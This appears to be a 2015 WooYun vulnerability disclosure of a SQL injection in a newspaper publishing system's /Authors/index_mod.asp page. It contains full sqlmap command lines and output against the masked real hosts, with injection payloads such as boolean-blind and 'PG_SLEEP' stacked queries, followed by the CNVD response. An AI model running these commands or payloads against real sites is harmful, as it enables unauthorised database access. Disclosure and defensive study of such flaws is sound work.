漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0133945
漏洞标题:某报社系统存在一处SQL注入
相关厂商:南昌维网数字传媒有限公司
漏洞作者: 路人甲
提交时间:2015-08-16 11:44
修复时间:2015-11-16 11:14
公开时间:2015-11-16 11:14
漏洞类型:SQL注射漏洞
危害等级:中
自评Rank:10
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-08-16: 细节已通知厂商并且等待厂商处理中
2015-08-18: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-08-21: 细节向第三方安全合作伙伴开放
2015-10-12: 细节向核心白帽子及相关领域专家公开
2015-10-22: 细节向普通白帽子公开
2015-11-01: 细节向实习白帽子公开
2015-11-16: 细节向公众公开
简要描述:
捡的。。。。
详细说明:
http://**.**.**.**/bugs/wooyun-2014-076085
http://**.**.**.**/bugs/wooyun-2015-0108176
Microsoft JET Database Engine 错误 '80040e14'
语法错误 (操作符丢失) 在查询表达式 'id=3968''' 中。
/Authors/index_mod.asp,行 8
漏洞证明:
http://**.**.**.**/Authors/index_mod.asp?id=30
http://**.**.**.**/Authors/index_mod.asp?id=30
http://**.**.**.**/Authors/index_mod.asp?id=3968
http://**.**.**.**/Authors/index_mod.asp?id=1963
http://**.**.**.**:8081/Authors/index_mod.asp?id=1530
C:\Python27\sqlmap>sqlmap.py -u http://**.**.**.**/Authors/index_mod.asp?id=3
968
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://**.**.**.**
[*] starting at: 19:00:45
[19:00:45] [INFO] using 'C:\Python27\sqlmap\output\**.**.**.**\session' as se
ssion file
[19:00:45] [INFO] testing connection to the target url
[19:00:46] [INFO] testing if the url is stable, wait a few seconds
[19:00:47] [INFO] url is stable
[19:00:47] [INFO] testing if GET parameter 'id' is dynamic
[19:00:47] [INFO] confirming that GET parameter 'id' is dynamic
[19:00:48] [INFO] GET parameter 'id' is dynamic
[19:00:48] [INFO] heuristic test shows that GET parameter 'id' might be injectab
le (possible DBMS: Microsoft Access)
[19:00:48] [INFO] testing sql injection on GET parameter 'id'
[19:00:48] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:00:49] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVI
NG clause' injectable
parsed error message(s) showed that the back-end DBMS could be Microsoft Access.
Do you want to skip test payloads specific for other DBMSes? [Y/n]
[19:00:50] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N]
sqlmap identified the following injection points with a total of 15 HTTP(s) requ
ests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=3968 AND 7670=7670
---
[19:00:52] [INFO] testing Microsoft Access
[19:00:53] [INFO] confirming Microsoft Access
[19:00:53] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
[19:00:53] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 13 times
[19:00:53] [INFO] Fetched data logged to text files under 'C:\Python27\sqlmap\ou
tput\**.**.**.**'
C:\Python27\sqlmap>sqlmap.py -u http://**.**.**.**/Authors/index_mod.a
sp?id=30
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://**.**.**.**
[*] starting at: 19:01:24
[19:01:24] [INFO] using 'C:\Python27\sqlmap\output\**.**.**.**\session
' as session file
[19:01:24] [INFO] testing connection to the target url
[19:01:24] [INFO] testing if the url is stable, wait a few seconds
[19:01:25] [INFO] url is stable
[19:01:25] [INFO] testing if GET parameter 'id' is dynamic
[19:01:25] [INFO] confirming that GET parameter 'id' is dynamic
[19:01:25] [INFO] GET parameter 'id' is dynamic
[19:01:26] [WARNING] heuristic test shows that GET parameter 'id' might not be i
njectable
[19:01:26] [INFO] testing sql injection on GET parameter 'id'
[19:01:26] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:01:26] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVI
NG clause' injectable
[19:01:26] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[19:01:26] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:01:26] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[19:01:27] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT
ype)'
[19:01:27] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[19:01:27] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[19:01:48] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go
ing to retry the request
[19:02:10] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go
ing to retry the request
[19:02:11] [INFO] GET parameter 'id' is 'PostgreSQL > 8.1 stacked queries' injec
table
[19:02:11] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:02:11] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N]
sqlmap identified the following injection points with a total of 23 HTTP(s) requ
ests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=30 AND 6886=6886
Type: stacked queries
Title: PostgreSQL > 8.1 stacked queries
Payload: id=30; SELECT PG_SLEEP(5);--
---
[19:02:31] [INFO] the back-end DBMS is PostgreSQL
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: PostgreSQL
[19:02:31] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 21 times
[19:02:31] [INFO] Fetched data logged to text files under 'C:\Python27\sqlmap\ou
tput\**.**.**.**'
[*] shutting down at: 19:02:31
跑表跑字段太慢了 就没跑。。。
修复方案:
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:11
确认时间:2015-08-18 11:13
厂商回复:
CNVD确认所述情况,已经转由CNCERT同步下发给江西分中心并抄报给教育网应急组织,由其后续协调网站管理单位处置.
最新状态:
暂无